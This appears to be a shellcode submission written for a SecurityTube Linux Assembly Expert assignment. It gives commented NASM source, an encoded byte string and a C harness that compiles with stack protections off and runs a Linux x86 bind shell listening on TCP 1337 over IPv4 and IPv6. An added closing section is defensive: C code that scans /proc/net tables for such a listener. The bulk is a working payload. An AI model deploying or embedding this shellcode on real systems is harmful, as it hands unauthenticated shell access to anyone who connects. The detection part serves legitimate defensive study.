Linux/x86 bind (1337/tcp) shell (/bin/sh) + (dual IPv4 and IPv6) shellcode (146 bytes)

/*
# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
# Date: 2018-08-18
# Shellcode Author: Kevin Kirsche
# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2

# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh

This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1134

Compilation instructions:
    gcc -o shellcode shellcode.c -fno-stack-protector -z execstack

Commented NASM:

global _start

section .text

_start:
  ; socket
  ;; cleanup
  xor ebx, ebx
  ;; arguments
  push ebx              ; #define IP_PROTO 0
  push 0x1              ; #define SOCK_STREAM 1
  push 0xa              ; #define PF_INET6 10
  ;; function
  mov ecx, esp          ; pointer to args on the stack into ecx
  push 0x66
  pop eax               ; socketcall 0x66 == 102
  inc ebx               ; #define SYS_SOCKET 1
  ;; call
  int 0x80
  ;; returned data
  xchg esi, eax         ; sockfd eax -> esi

  ; setsocketopt
  ;; cleanup
  xor eax, eax
  ;; arguments
  push eax              ; NO = 0x0
  mov edx, esp          ; get a pointer to the null value
  push 0x2              ; sizeof(NO)
  push edx              ; pointer to NO
  push 0x1a             ; #define IPV6_V6ONLY 26
  push 0x29             ; #define IPPROTO_IPV6
  ;; function
  mov ecx, esp          ; pointer to args on the stack into ecx
  mov al, 0x66          ; socketcall 0x66 == 102
  mov bl, 0xe           ; #define SYS_SETSOCKOPT 14
  ;; call
  int 0x80

  ; bind ipv4
  ;; cleanup
  xor edx, edx
  ;; v4lhost struct
  push edx              ; #define INADDR_ANY 0
  push word 0x3905      ; port 1337 in big endian format
  push 0x2              ; #define AF_INET 2
  ;; arguments
  mov ecx, esp          ; pointer to v4lhost struct arguments
  push 0x10             ; sizeof v4lhost
  push ecx              ; pointer v4lhost
  push esi              ; push sockfd onto stack
  ;; function
  mov ecx, esp          ; argument pointer into ecx
  mov bl, 0x2           ; #define SYS_BIND 2
  mov al, 0x66          ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; bind ipv6
  ;; cleanup
  xor eax, eax
  ;; v6lhost struct
  push dword eax        ; v6_host.sin6_addr
  push dword eax
  push dword eax
  push dword eax
  push dword eax
  push word 0x3905      ; port 1337
  push word 0x0a        ; PF_INET6
  ;; arguments
  mov ecx, esp          ; pointer to struct into ecx
  push 0x1c             ; sizeof struct
  push ecx              ; pointer to struct
  push esi              ; sockfd
  ;; function
  mov ecx, esp          ; arguments into register
  mov bl, 0x2           ; #define SYS_BIND 2
  mov al, 0x66          ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; listen
  ;; arguments
  push byte 0x2         ; queuelimit = 2
  push esi              ; sockfd
  ;; function
  mov ecx, esp          ; pointer to args into ecx
  mov bl, 0x4           ; #define SYS_LISTEN 4
  mov al, 0x66          ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; accept
  ;; cleanup
  xor ebx, ebx
  ;; arguments
  push ebx              ; push NULL
  push ebx              ; push NULL
  push esi              ; sockfd
  ;; function
  mov ecx, esp          ; pointer to args into ecx
  mov bl, 0x5           ; #define SYS_ACCEPT 5
  mov al, 0x66          ; socketcall 0x66 == 102
  ;; call
  int 0x80
  ;; returned data
  xchg ebx, eax         ; ebx holds the new sockfd that we accepted

  ; dup file descriptor
  ;; setup counters
  sub ecx, ecx          ; zero out ecx
  mov cl, 0x2           ; create a counter
  ;; loop
duploop:
  mov al, 0x3f          ; SYS_DUP2 syscall
  int 0x80              ; call SYS_DUP2
  dec ecx               ; decrement loop counter
  jns duploop           ; as long as SF is not set, keep looping

  ; execve
  ;; cleanup
  xor edx, edx
  ;; command to run
  push edx              ; NULL string terminator
  push 0x68732f2f       ; hs//
  push 0x6e69622f       ; nib/
  ;; arguments
  mov ebx, esp          ; pointer to args into ebx
  push edx              ; null ARGV
  push ebx              ; command to run
  ;; function
  mov ecx, esp
  mov al, 0x0b          ; execve systemcall
  int 0x80
*/

#include <stdio.h>
#include <string.h>

unsigned char code[] =
"\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
"\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
"\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
"\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
"\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
"\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
  // pollute the registers
  asm("mov $0x78975432, %eax\n\t"
      "mov $0x17645589, %ecx\n\t"
      "mov $0x23149875, %edx\n\t");

  // begin shellcode (strlen returns size_t, so print it with %zu)
  printf("Shellcode Length: %zu\n", strlen((const char *)code));

  // execute our shellcode
  int (*ret)() = (int(*)())code;
  ret();
}

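On the defensive side, the bind step above leaves a recognisable footprint: a socket in LISTEN state on the wildcard address, port 1337 (hex `0539`), and because the socket is `PF_INET6` it is listed in `/proc/net/tcp6` rather than `/proc/net/tcp`. The following is an added example, not part of the original submission: it checks rows of either table for that pattern. The function names and the sample rows are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define TCP_LISTEN 0x0A /* "st" column value for a listening socket */

/* Return 1 if one /proc/net/tcp or /proc/net/tcp6 row is a LISTEN socket bound
 * to the wildcard address (0.0.0.0 or ::) on `port`; header rows return 0. */
int is_wildcard_listener(const char *row, unsigned port)
{
    char addr[33];
    unsigned lport, state;
    /* Row layout: "sl: local_addr:port remote_addr:port st ...", all hex. */
    if (sscanf(row, " %*d: %32[0-9A-Fa-f]:%x %*[0-9A-Fa-f]:%*x %x",
               addr, &lport, &state) != 3)
        return 0;
    return state == TCP_LISTEN && lport == port &&
           strspn(addr, "0") == strlen(addr);
}

/* Count matching rows in a live table; -1 if the file cannot be read. */
int scan_file(const char *path, unsigned port)
{
    char row[512];
    int hits = 0;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    while (fgets(row, sizeof row, f))
        hits += is_wildcard_listener(row, port);
    fclose(f);
    return hits;
}

/* Constructed sample rows in /proc/net/tcp6 layout, trailing columns cut. */
const char *SAMPLE_TCP6[] = {
    "  sl  local_address remote_address st",
    "   0: 00000000000000000000000000000000:0016 00000000000000000000000000000000:0000 0A",
    "   1: 00000000000000000000000000000000:0539 00000000000000000000000000000000:0000 0A",
    "   2: 00000000000000000000000001000000:0539 00000000000000000000000000000000:0000 0A",
    "   3: 0000000000000000FFFF00000100007F:0539 0000000000000000FFFF00000100007F:C350 01",
};

int main(void)
{
    for (size_t i = 0; i < sizeof SAMPLE_TCP6 / sizeof *SAMPLE_TCP6; i++)
        printf("sample row %zu: %d\n", i, is_wildcard_listener(SAMPLE_TCP6[i], 1337));
    printf("live tcp=%d tcp6=%d\n", scan_file("/proc/net/tcp", 1337),
           scan_file("/proc/net/tcp6", 1337));
    return 0;
}
```

Only sample row 1 matches: row 2 listens on `::1` alone, and row 3 is an established connection from an IPv4-mapped peer, not a listener.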